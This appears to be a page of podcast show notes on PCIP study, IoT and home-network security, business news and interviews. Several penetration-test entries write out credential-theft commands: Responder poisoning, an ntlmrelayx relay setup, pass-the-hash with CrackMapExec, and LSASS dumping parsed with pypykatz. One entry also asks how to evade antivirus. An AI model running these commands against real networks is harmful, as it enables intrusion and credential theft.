Yay - I'm a PCIP now! I welcome you to check out our past episodes on PCIP, but in some ways this will be the be all, end all episode on the topic. Today I cover: Study materials that helped me prepare: PCIP book by Linda Jones (I couldn't actually get this one in time but it looks awesome!) Flashcards from Cram Flashcards from Quizlet My flashcards from Quizlet (I'll need to sanitize these and give you the password. Contact me if interested) Flashcards from ProProfs Documentation from PCI Web site itself - specifically the glossary, quick reference guide and my personal favorite, the prioritized approach guidance I also talk about taking the exam from home which was an interesting experience (as well as a privacy/security mini nightmare!).

Hello! This episode is a true homecoming in that I actually recorded it from home. Yay! WARNING!!! WARNING!!! This episode contains a ton of singing. If you don't like singing, do not listen!!! With that said, I wanted to follow up on part 1 and 2 of this series and share some additional cool tools that others have told me about in regards to securing and monitoring all your ioTs! Home Assistant - is described on its Wikipedia page as "a free and open-source home automation software designed to be the central control system in a smart home or smart house." You can quickly grab the HA image and dump it on an SD card with Balena Etcher and be up and running in minutes. I found HA a bit overkill/complicated for my needs, but my pal Hackernovice (on 7MS Slack) says this video demonstrates why he really loves it. Prometheus, recommended by our pal Mojodojo101, is "a systems and service monitoring system. It collects metrics from configured targets at given intervals, evaluates rule expressions, displays the results, and can trigger alerts if some condition is observed to be true." I found a great RPi install guide that will help you get it up and running in a snap. I love the capabilitiesand possibilities of Prometheus, but much like Home Assistant, it quickly got to "more than I need" territory. The final thing we talk about today is trying to answer this question: with so many of my ioTs tied to some cloud app/service, how do I keep these accounts themselves as secure as possible? Songs sung in this episode include: Follow Through by Gavin DeGraw Livin' on a Prayer The Look that Says You Love Me (Brian Johnson) Goodness of God

Hey, hope you're having a great week! The last few weeks have had somewhat of a homecoming and home cleaning theme. To continue that train of thought, over the last few days I've gotten heavy into cleaning up my cloud clutter - cloud services, email, file sharing, etc. - in an effort to be more secure and have a reduced digital footprint. Today's tips include: Double-check that any device you have that supports full-disk encryption has it enabled On all your machines, clean up old straggler artifacts in C:, desktop folder, downloads folder, etc. Use the nifty built in tools for Windows 10 to free up even more disk space (I just learned about this one recently - Windirstat and Treesizefree were my go-tos for years) Got old PCs sitting around you're not using? Nuke 'em with DBAN. Go into your password vault and clean out creds for services you don't use anymore (especially for old client projects!) Purge your file share services (Dropbox, OneDrive, etc. on a regular basis), and/or bring older archives over to cold (on-site) encrypted storage Review your "bottleneck" accounts (key email accounts, for example) and review the devices/services linked to them - clean up and purge regularly Handling password hashes? Here's one way to setup an encrypted partition for them You can clean old email from Gmail quickly using some simple searches. You can also use Google Takeout to download offline copies of mail and then browse them later with Thunderbird

Hi again! It's sort of fun to release two episodes in one week for a change. If you missed part 1 on our ioT security series, check it out here. Today we dive into some free/cheap monitoring solutions you can use to keep tabs on your ioT network (or any network, really): Nagios - it's old school but gets the job done. This article helped me get it going on an RPi. SolarWinds IP monitor - it was quick and easy to get up and running, but the 40 monitors you're allotted get burned up pretty quick if you have a decent number of devices to monitor PRTG - this is the winner in my book. It has a generous amount of monitors, quick/easy install, and a native mobile app!

WE'RE HOME! After almost a year after our fire, we're back, baby! This episode is somewhat of a homecoming that dovetails into an episode about ioT security. I've basically done a 180 degree spin on ioT stuff. I now love the coolness and convenience of these things while simultaneously being terrified of the security risks. Is there a happy balance somewhere between the two? Maybe. Today we dive into ioT security, specifically: Setting up a ioT dedicated wireless network Quarantining it so it can only talk to the Internet Poking holes in the firewall to allow ioT DNS requests to be captured Scanning your ioT for services and potential default/weak cred use

Hi! Today our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax has prepared some cyber-licious actionable news stories for us to chew on. Today's stories include: Cybersecurity skills gap (powered by lack of career development!) Which cyber jobs are hot - or not? Mysterious wave of DDoS attacks The Magecart threat group pwns thousands of ecommerce sites On a parting note, don't forget to patch your DCs against Zerologon! Here's a great Twitter thread breakdown that explains it in more detail

Yay! It's time for another tale of pentest pwnage! Highlights include: Making sure you take multiple rounds of "dumps" to get all the delicious local admin creds. Why lsassy is my new best friend. I gave a try to using a Ubuntu box instead of Kali as my attacking system for this test. I had pretty good results. Here's my script to quickly give Ubuntu a Kali-like flair: sudo apt-get update sudo apt-get upgrade -y sudo apt-get install openssh-server -y sudo apt-get install nmap curl dnsrecon git net-tools open-vm-tools-desktop python3.8 python3-pip unzip wget xsltproc -y #Aha helps take output from testssl.sh and make it nice and HTML-y sudo git clone https://github.com/theZiz/aha.git /opt/aha #Awesome-nmap-grep makes it easy to grep nmap exports for just the data you need! sudo git clone https://github.com/leonjza/awesome-nmap-grep.git /opt/awesome-nmap-grep #bpatty is...well...bpatty! sudo git clone https://github.com/braimee/bpatty.git /opt/bpatty #CrackMapExec is...awesome sudo mkdir /opt/cme cd /opt/cme sudo curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.1.0dev/cme-ubuntu-latest.1.zip -L -o cme.zip sudo unzip cme.zip sudo chmod +x ./cme #eyewitness is a nice recon tool for putting some great visualization behind nmap scans sudo git clone https://github.com/FortyNorthSecurity/EyeWitness.git /opt/eyewitness cd /opt/eyewitness/Python/setup sudo ./setup.sh #impacket is "a collection of Python classes for working with network protocols" #I currently primarily use it for ntlmrelayx.py sudo git clone https://github.com/CoreSecurity/impacket.git /opt/impacket cd /opt/impacket sudo pip3 install . #mitm6 is a way to tinker with ip6 and get around some ip4-level protections sudo git clone https://github.com/fox-it/mitm6.git /opt/mitm6 cd /opt/mitm6 sudo pip3 install -r requirements.txt # install service-identity sudo pip3 install service-identity # lsassy sudo python3 -m pip install lsassy #nmap-bootstrap-xsl turns nmap scan output into pretty HTML sudo git clone https://github.com/honze-net/nmap-bootstrap-xsl.git /opt/nmap-bootstrap-xsl #netcreds "Sniffs sensitive data from interface or pcap" sudo git clone https://github.com/DanMcInerney/net-creds /opt/netcreds #PCCredz parses pcaps for sensitive data sudo git clone https://github.com/lgandx/PCredz /opt/pcredz #Powersploit is "a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment" sudo git clone https://github.com/PowerShellMafia/PowerSploit.git /opt/powersploit #PowerupSQL is a tool for discovering, enumerating and potentially pwning SQL servers! sudo git clone https://github.com/NetSPI/PowerUpSQL.git /opt/powerupsql #responder is awesome for LLMNR, NBT-NS and MDNS poisoning sudo git clone https://github.com/lgandx/Responder.git /opt/responder

Today we're talking business! We've got some exciting news and updates to share with you since we last did a "crying" episode last fall: 7MS hired a VP of sales and marketing: Clyde Cooper! We've added some new tools to our tools/services gist: Having a true sales force for the first time has prompted us to invest in Salesforce. There are a few gotchas with signing up for a Salesforce trial and then migrating to a paid plan (discussed more in today's episode) We're trying to "eat our own dog food" and part of that includes good inventory management. For that we've started to play with Rumble and reaaaaaaaaaaalllly like it Recording an "about us" video with a production company is exciting, stressful and awkward Today I met the guy who wins the Internet (or at least LinkedIn) - he sent me a personalized video with an idea I'm definitely going to steal for future marketing initiatives For really no reason at all, I sing for you a bit in this episode On that note, I absolutely love this song. I feel like it's my family's theme song for the last year.

Today we're thrilled to have our friend and PlexTrac CEO Dan DeCloss back to the program! (P.S. PlexTrac is launching runbooks as a feature - and you should definitely check out PlexTrac's upcoming Webinar about runbooks on September 9!). We also did a PlexTrac 101 Webinar with them recently! You may remember Dan from such podcasts as this one when we first talked to him in 2019. Dan and I have a lot in common in that we both started security companies about the same time, so I had a lot of questions for Dan around how business has been going since we last talked on the podcast. Today our topics/questions include: What are the (good) warning signs that a passion project you have could be a viable business? Why "having all the jobs there has ever been" is a great way to figure out it's time to start your own business :-) At what point does a side project have to become what you do for your day job? How do you safely prepare to quit a comfortable corporate life to life as a small biz owner? Do you go 100% on faith? Do you save your $ for a year so you can "float" your business for a while? Some combination of the two? How important is it to have the support of your friends/family when starting a new biz? Once you start a biz what are the best/worst things about wearing all the hats (engineering, sales, marketing, accounting, HR, etc.)? When is it time to hire additional resources or raise additional money to support your growing business? What marketing efforts are fruitful for a new security biz to spend time/money on? How do you decide what bells/whistles to add to PlexTrac? Follow your own roadmap? Let the customers drive your direction? Some combo of both? What new bells and whistles are coming to PlexTrac in the Webinar on September 9?! (Spoiler alert: RUNBOOKS!)

Hola! We're back again with our amigo Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include: The Twitter hack that promised free Bitcoin for everybody - with good coverage by Krebs and Threatpost Garmin's personal and painful experience with ransomware Joe offers 7 tips any org can use to reduce their likelihood of getting pwned with an attack or ransomware Are we ready to endure a cyber crisis? Would you fall for this social engineering attack?

Welcome to another fun tale of internal pentest pwnage! Today's tale includes these helpful informational tidbits: My understanding is that in order for mitm6 relay attacks to work against DCs, those DCs have to have LDAPS config'd properly. Use nmap -sV -p646 name.of.domain.controller to verify this (thanks this site for the tip!) PowerView is awesome when used with Find-InterestingDomainShareFile to find interesting files with the word password or sensitive or other helpful strings. eavesarp helped me identify some weird hosts on weird subnets sending regular bursts of traffic to "interesting" hosts! Check out this video from Black Hills Infosec to learn more. I've also got some personal updates for you, including: House updates Fighting with the man/woman upstairs My worst Webinar nightmare came true A socially distanced wedding singing experience

Today we're thrilled to welcome Ameesh Divatia from Baffle back to the program. We first met Ameesh back in episode 349 and today he's back to discuss a slew of additional hot security topics, including: Misconfigured cloud databases Why is this such a common issue, and how can we address it? Wait wait wait...I just spun up a machine in Azure, AWS, Digital Ocean, etc. Isn't it secure because....it's the cloud? What tools can we use to better secure our cloud databases? How can we secure sensitive information as we migrate it from LAN side to the cloud? CCPA (California Consumer Privacy Act) What is the CCPA? How does it relate to GDPR? If I'm a Californian, what can I demand to know from companies as far as how they're using my data? What can't I demand to know? Will CCPA inspire folks to scrub their data from the hands of big companies and go more "off the grid?" Does CCPA only apply to California residents and companies? Secure data sharing What are the current challenges with secure data sharing in terms of monitoring the flow of data within their systems and their partners' systems, while addressing privacy concerns? What are some of the common mistakes companies make when sharing sensitive data internally or with partners/clients? What is Secure Multiparty Compute (SMPC) and how can it help with secure data sharing?

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. First and foremost, I have to say that 7 Minute Security's official stance on toads is that nobody should be licking them at any time, for any reason. Also, I can neither confirm nor deny that toads can catch coronavirus. Listen to today's episode...it'll make more sense. We've got another swell tale of internal pentest pwnage for you today! Highlights include: If you've collected a ton of hashes with Responder, the included DumpHash.py gives you a lovely organized list of collected hashes! Here's one way you can grab the latest CME binary: curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip Note to self: I must've been using outdated CME forever, because the correct syntax to get the wdigest flag is now a little different: cme smb HOST -u localadmin -H "hash" --local-auth -M wdigest -o ACTION=enable If you're looking to block IPv6 (ab)use in your environment, this article has some great tips. When testing in an environment with a finely tuned SIEM, I highly recommend you download all the Kali updates and tools ahead of time, as sometimes just the call out to kali.org gets flagged and alerted on to the security team Before using the full hatecrack methodology, I like to run hashes straight through the list of PwnedPasswords from hashes.org (which appears to currently be offline) first to give the org an idea as to what users are using easy-to-pwn passwords. A question for YOU reading this: what's the best way to do an LSASS dump remotely without triggering AV? I can't get any of the popular methods to work. So pypykatz is my go-to. I learned that PowerView is awesome for finding attractive shares! Run it with Find-InterestingDomainShareFile to find, well, interesting files! Files with password or sensitive or admin in the title - and much more! Got to use PowerUpSQL to audit some MS SQL sauce, and I found this presentation (specifically slide ~19) really helpful in locating servers I could log into and any SQL vulnerabilities the boxes were ripe for.

Today's episode is all about creating and deploying your own pentest dropbox! In part 1 I talked about some "gotchas" but this time around I'm ready to dump a whole slug of specific and updated tips on ya! Below are the tips covered in this episode that are better read than said: For the Windows VM Turn on RDP with PowerShell: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 Enable-NetFirewallRule -DisplayGroup "Remote Desktop" Change time zone with command line: tzutil /s "Central Standard Time" Install Chrome with PowerShell: $LocalTempDir = $env:TEMP; $ChromeInstaller = "ChromeInstaller.exe"; (new-object System.Net.WebClient).DownloadFile('http://dl.google.com/chrome/install/375.126/chrome_installer.exe', "$LocalTempDir\$ChromeInstaller"); & "$LocalTempDir\$ChromeInstaller" /silent /install; $Process2Monitor = "ChromeInstaller"; Do { $ProcessesFound = Get-Process | ?{$Process2Monitor -contains $_.Name} | Select-Object -ExpandProperty Name; If ($ProcessesFound) { "Still running: $($ProcessesFound -join ', ')" | Write-Host; Start-Sleep -Seconds 2 } else { rm "$LocalTempDir\$ChromeInstaller" -ErrorAction SilentlyContinue -Verbose } } Until (!$ProcessesFound) Install PowerUpSQL: Install-Module -Name PowerUpSQL Turn off sleepy time: powercfg.exe -change -standby-timeout-ac 0 Install DotNet 3.5: dism /online /Enable-Feature /FeatureName:"NetFx3" For the Kali VM Refresh the SSH keys: apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service Get SharpHound and Mimikatz: wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200519/mimikatz_trunk.zip wget https://github.com/BloodHoundAD/BloodHound/raw/master/Ingestors/SharpHound.exe Install pypykatz sudo pip3 install pypykatz Install CrackMapExec binaries (which at time of this publication is this one): curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

Hello! We're back with our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include: Hackers are trying to steal admin passwords from F5 devices Secret service reports increase in hacked MSPs Most Popular Home Routers Have 'Critical' Flaws "Sigred" DNS vulnerability in Microsoft DNS

This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows: Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven! Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down. Testing for MS14-025 is easy with this site. mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this: smb://CORP\[email protected] smb://CORP\[email protected] smb://CORP\[email protected] 192.168.195.7 192.168.195.10 Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ! Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done. Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share Then, once you've pulled back the lsass.dmp file, you can rip through it easily with: pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!